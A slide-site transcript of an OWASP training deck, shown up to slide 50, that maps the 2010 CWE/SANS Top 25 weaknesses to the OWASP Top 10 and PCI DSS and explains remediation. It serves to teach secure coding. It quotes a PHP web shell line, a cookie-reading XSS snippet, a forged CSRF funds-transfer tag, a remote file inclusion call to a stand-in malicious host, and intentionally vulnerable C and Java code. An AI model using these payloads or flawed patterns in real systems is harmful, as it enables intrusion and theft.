1 / 61

2010 CWE/SANS Top 25 - Mapping and Remediation Guide

Understand 2010 CWE/SANS Top 25 weaknesses, mappings to OWASP Top 10/PIC DSS V2, and ways to remediate them. Learn about common software errors and best practices for security.

bessiea
Download Presentation

2010 CWE/SANS Top 25 - Mapping and Remediation Guide

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping • Keith TurpinThe Boeing Company • OWASP Secure Coding Practices Lead • OWASP Global Projects Committee • keith.turpin@owasp.org Nishi Kumar IT Architect Specialist, FIS OWASP CBT Project Lead OWASP Global Industry Committee Nishi.Kumar@owasp.org

  2. Objectives • Provide an overview of the 2010 CWE/SANS Top 25 • Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2 • Understand the CWE/SANS Top 25 weaknesses and • how to remediate them

  3. Organizations • MITRE - http://www.mitre.org/ The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. Mitre currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors. CWE Database - http://cwe.mitre.org/ • SANS - http://www.sans.org The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list of computing security training programs and its work with Mitre on the CWE/SANS Top 25 Most Dangerous Software Errors.

  4. Selection and Ranking • Builds on the original 2009 version • Methodology - Qualitative rather than quantitative • Factors in ranking - Prevalence and severity • Initially started with 41 candidate weaknesses

  5. 2010 CWE/SANS Top 25

  6. SANS CWE Top 25

  7. OWASP Top 10 & SANS CWE Top 25 mapping

  8. OWASP Top 10 & SANS CWE Top 25 mapping

  9. SANS CWE Top 25

  10. Mapping Considerations • SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses • SANS CWE Top 25 applies to both web and non-web applications • OWASP defines ten risks focused on web applications • OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities • PCI DSS Requirements point to both as industry best practices

  11. [1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Try this in your browser's address bar: javascript:alert(document.cookie)

  12. [1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') E.g. outputencodingwith HTML entity encoding:The < character becomes: &lt; The " character becomes: &quot; This tag <script> becomes: &lt;script&gt

  13. [2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')

  14. [2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')

  15. [3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') • Example: C • char last_name[20];...................................Declare array with 20 character limit • printf ("Enter your last name: "); • scanf ("%s", last_name); ...........................Get input (no limit) and store in array • The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters

  16. [3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

  17. [4] CWE-352Cross-Site Request Forgery (CSRF) • Example of a legitimate request: • http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 • Example or a forged request using a hidden image tag: • <imgsrc=http://example.com/app/transferFunds?amount=1500&destinationAccount= • attackersAcct# width="0" height="0" />

  18. [4] CWE-352Cross-Site Request Forgery (CSRF)

  19. [5] CWE-285 Improper Authorization

  20. [5] CWE-285 Improper Authorization

  21. [6] CWE-807Reliance on Untrusted Inputs in a Security Decision

  22. [6] CWE-807Reliance on Untrusted Inputs in a Security Decision

  23. [7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

  24. [7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

  25. [8] CWE-434Unrestricted Upload of File with Dangerous Type Example: PHP <?php system($_GET['cmd']); ?>

  26. [8] CWE-434Unrestricted Upload of File with Dangerous Type

  27. [9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

  28. [9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

  29. [10] CWE-311Missing Encryption of Sensitive Data

  30. [10] CWE-311Missing Encryption of Sensitive Data

  31. [11] CWE-798Use of Hard-coded Credentials

  32. [11] CWE-798Use of Hard-coded Credentials

  33. [12] CWE-805Buffer Access with Incorrect Length Value

  34. [12] CWE-805Buffer Access with Incorrect Length Value

  35. [13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') Example: PHP $dir = $_GET['module_name']; include($dir . "/function.php"); Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com

  36. [13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

  37. [14] CWE-129Improper Validation of Array Index Example: Java public String getValue(int index) { return array[index]; } If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised

  38. [14] CWE-129Improper Validation of Array Index

  39. [15] CWE-754Improper Check for Unusual or Exceptional Condition Example: Java (Bad Code)Example Language: Java String itemName = request.getParameter(ITEM_NAME); if (itemName.compareTo(IMPORTANT_ITEM) == 0) { ... } The code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.

  40. [15] CWE-754Improper Check for Unusual or Exceptional Condition

  41. [16] CWE-209Information Exposure Through an Error Message • Example: Java • try { • /.../ • } catch (Exception e) { • System.out.println(e); • } • If this output is redirected to a web user, this may represent a security problem • In the following example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.

  42. [16] CWE-209Information Exposure Through an Error Message

  43. [17] CWE-190Integer Overflow or Wraparound Example: C nresp = packet_get_int(); if (nresp > 0) { response = xmalloc(nresp*sizeof(char*)); for (i = 0; i > nresp; i++) response[i] = packet_get_string(NULL); } If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response

  44. [17] CWE-190Integer Overflow or Wraparound

  45. [18] CWE-131Incorrect Calculation of Buffer Size Example: C int *id_sequence; id_sequence = (int*) malloc(3); if (id_sequence == NULL) exit(1); id_sequence[0] = 13579; id_sequence[1] = 24680; id_sequence[2] = 97531; The size parameter used during the malloc() call is set to '3' which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space

  46. [18] CWE-131Incorrect Calculation of Buffer Size

  47. [19] CWE-306Missing Authentication for Critical Function

  48. [19] CWE-306Missing Authentication for Critical Function

  49. [20] CWE-494Download of Code Without Integrity Check Example: Java URL[] classURLs= new URL[]{ new URL("file:subdir/") }; URLClassLoader loader = new URLClassLoader(classURLs); Class loadedClass = Class.forName("loadMe", true, loader); This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.

  50. [20] CWE-494Download of Code Without Integrity Check

More Related